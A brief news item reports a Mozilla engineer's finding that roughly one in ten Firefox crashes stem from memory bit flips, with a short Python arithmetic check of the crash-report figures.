Mozilla Staff Platform Engineer Gabriele Svelto says one in ten Firefox crashes is caused by bit flips: events in which individual bits stored in an electronic device flip, say from 0 to 1 or vice versa. Natural causes include cosmic rays, power fluctuations, and temperature. Last year Firefox deployed a memory-testing tool that runs on a user's computer after the browser crashes. Last week Firefox received 470,000 crash reports; since reports are submitted voluntarily, the real number of crashes is typically several times higher. Of those 470,000 reports, about 25,000 were flagged as likely caused by bit flips, meaning roughly one in twenty crashes may stem from unstable or intermittently faulty memory. Because the detection method is very conservative, the true figure is at least double, i.e., one in ten. Svelto notes that users with unstable hardware are more likely to crash than those with stable hardware, and that the RAM in today's laptops and smartphones is usually soldered to the device, making replacement essentially impossible.
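The quoted rates follow directly from the report counts; a quick arithmetic check using the numbers above:

```python
reports = 470_000   # crash reports received in one week
flagged = 25_000    # reports where the memory test flagged a likely bit flip

detected = flagged / reports   # conservative detected fraction, about 5.3%
one_in = 1 / detected          # roughly one crash in every twenty reports
estimated = 2 * detected       # detection is conservative: at least double,
                               # i.e. about one crash in ten
```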